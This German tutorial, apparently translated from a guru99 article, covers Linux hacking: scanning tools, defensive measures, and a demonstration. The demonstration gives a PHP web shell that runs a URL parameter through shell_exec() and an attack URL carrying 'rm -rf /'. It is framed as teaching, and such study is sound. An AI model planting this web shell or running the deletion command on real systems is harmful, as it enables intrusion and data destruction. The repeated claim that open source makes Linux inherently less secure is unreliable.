Hacking Linux OS: Hacking mit Ubuntu (Commands Tutorial)

Linux ist das am weitesten verbreitete Server-Betriebssystem, insbesondere für Webserver. Es ist quelloffen; das bedeutet, dass jeder Zugang zum Quellcode haben kann. Das macht es im Vergleich zu anderen Betriebssystemen weniger sicher, da Angreifer den Quellcode studieren können, um Schwachstellen zu finden. Bei Linux für Hacker geht es darum, diese Schwachstellen auszunutzen, um unbefugten Zugang zu einem System zu erhalten.

In diesem Artikel stellen wir Ihnen vor, was Linux ist, seine Sicherheitslücken, das Hacken mit Ubuntu und die Gegenmaßnahmen, die Sie ergreifen können.

In diesem Tutorial behandelte Themen

  • Kurzer Hinweis zu Linux
  • Linux-Hacking-Tools
  • Wie man Linux-Hacks verhindert
  • Hacking-Aktivitäten: Hacken eines Linux-Systems mit PHP

Kurzer Hinweis zu Linux

Linux ist ein Open-Source-Betriebssystem. Es gibt viele Distributionen von Linux-basierten Betriebssystemen wie Redhat, Fedora und Ubuntu, etc. Im Gegensatz zu anderen Betriebssystemen ist Linux weniger sicher, wenn es um die Sicherheit geht. Das liegt daran, dass der Quellcode frei verfügbar ist, so dass es im Vergleich zu anderen Betriebssystemen, die nicht quelloffen sind, leicht ist, ihn auf Schwachstellen zu untersuchen und diese auszunutzen. Linux kann als Server-, Desktop-, Tablet- oder Mobilgeräte-Betriebssystem verwendet werden.

Linux-Programme können entweder über die Benutzeroberfläche oder über Befehle bedient werden. Die Linux-Befehle für das Kali-Linux-Hacking sind effektiver und effizienter als die Verwendung der GUI. Aus diesem Grund ist es hilfreich, grundlegende Linux-Befehle für das Hacken zu kennen.

In diesen Tutorials https://www.guru99.com/unix-linux-tutorial.html erfahren Sie, wie Sie mit Kali Linux Hacks beginnen können.

Linux-Hacking-Tools

  • Nessus- dieses Tool kann für den Ubuntu-Hack verwendet werden und scannt Konfigurationseinstellungen, Patches und Netzwerke usw. Es kann unter https://www.tenable.com/products/nessus
  • NMap gefunden werden. Mit diesem Tool können Sie die auf dem Server laufenden Hosts und die von ihnen genutzten Dienste überwachen. Es kann auch zum Scannen nach Ports verwendet werden. Sie finden es unter https://nmap.org/
  • SARA – SARA ist die Abkürzung für Security Auditor’s Research Assistant. Wie der Name schon sagt, kann dieses Tool verwendet werden, um Netzwerke auf Bedrohungen wie SQL Injection, XSS usw. zu prüfen. Sie finden es unter http://www-arc.com/sara/sara.html

Die obige Liste ist nicht vollständig; sie gibt Ihnen eine Vorstellung von den Tools, die für das Hacken von Ubuntu und Linux-Systemen verfügbar sind.

Wie man Linux-Hacks verhindert

Linux-Hacking nutzt die Schwachstellen des Betriebssystems aus. Eine Organisation kann die folgenden Maßnahmen ergreifen, um sich vor solchen Angriffen zu schützen.

  • Patch-Management – Patches beheben Fehler, die Angreifer ausnutzen, um ein System zu kompromittieren. Eine gute Patch-Verwaltung stellt sicher, dass Sie ständig relevante Patches auf Ihr System aufspielen.
  • Korrekte Betriebssystemkonfiguration- andere Angriffe nutzen die Schwächen in der Konfiguration des Servers aus. Inaktive Benutzernamen und Daemons sollten deaktiviert werden. Standardeinstellungen wie allgemeine Kennwörter für Anwendungen, Standardbenutzernamen und einige Portnummern sollten geändert werden.
  • Intrusion Detection System- solche Tools können verwendet werden, um unbefugten Zugriff auf das System zu erkennen. Einige Tools sind in der Lage, solche Angriffe zu erkennen und zu verhindern.

Hacking Activity: Hack eines Ubuntu-Linux-Systems mit PHP

In diesem praktischen Szenario werden wir lernen, wie man Ubuntu hackt und wir werden Ihnen grundlegende Informationen darüber geben, wie Sie PHP verwenden können, um ein Linux-System zu kompromittieren. Wir werden nicht auf ein Opfer abzielen. Wenn Sie es ausprobieren möchten, können Sie LAMPP auf Ihrem lokalen Rechner installieren.

PHP verfügt über zwei Funktionen, mit denen man Linux-Hacking-Befehle ausführen kann. Es gibt die Funktionen exec() und shell_exec(). Die Funktion exec() gibt die letzte Zeile der Befehlsausgabe zurück, während die Funktion shell_exec() das gesamte Ergebnis des Befehls als String zurückgibt.

Nehmen wir zu Demonstrationszwecken an, dass der Angreifer die folgende Datei auf einen Webserver hochlädt.

<?php$cmd = isset($_GET) ? $_GET : 'ls -l';echo "executing shell command:-> $cmd</br>";$output = shell_exec($cmd);echo "<pre>$output</pre>";?>

HIER,

Das obige Skript holt den Befehl aus der GET-Variable namens cmd. Der Befehl wird mit shell_exec() ausgeführt und das Ergebnis im Browser angezeigt.

Der obige Code kann mit der folgenden URL ausgenutzt werden

http://localhost/cp/konsole.php?cmd=ls%20-l

HIER,

  • „…konsole.php?cmd=ls%20-l“ weist der Variablen cmd den Wert ls -l zu.

Der Befehl in Ubuntu zum Hacken des Servers wird wie folgt ausgeführt

shell_exec('ls -l') ;

Die Ausführung des obigen Codes auf einem Webserver führt zu ähnlichen Ergebnissen wie den folgenden.

Der obige Befehl zeigt einfach die Dateien im aktuellen Verzeichnis und die Berechtigungen an

Nehmen wir an, der Angreifer führt den folgenden Befehl aus

rm -rf /

HIER,

  • „rm“ löscht die Dateien
  • „rf“ lässt den rm-Befehl in einem rekursiven Modus laufen. Das Löschen aller Ordner und Dateien
  • „/“ weist den Befehl an, mit dem Löschen von Dateien im Stammverzeichnis zu beginnen

Die Angriffs-URL würde etwa so aussehen

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Zusammenfassung

  • Linux ist ein beliebtes Betriebssystem für Server, Desktops, Tablets und mobile Geräte.
  • Linux ist quelloffen, und der Quellcode kann von jedermann bezogen werden. Das macht es einfach, Schwachstellen zu erkennen. Es ist eines der besten Betriebssysteme für Hacker.
  • Grundlegende und Netzwerk-Hacking-Befehle in Ubuntu sind wertvoll für Linux-Hacker.
  • Schwachstellen sind Schwachstellen, die ausgenutzt werden können, um ein System zu kompromittieren.
  • Eine gute Sicherheit kann helfen, ein System davor zu schützen, von einem Angreifer kompromittiert zu werden.

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht.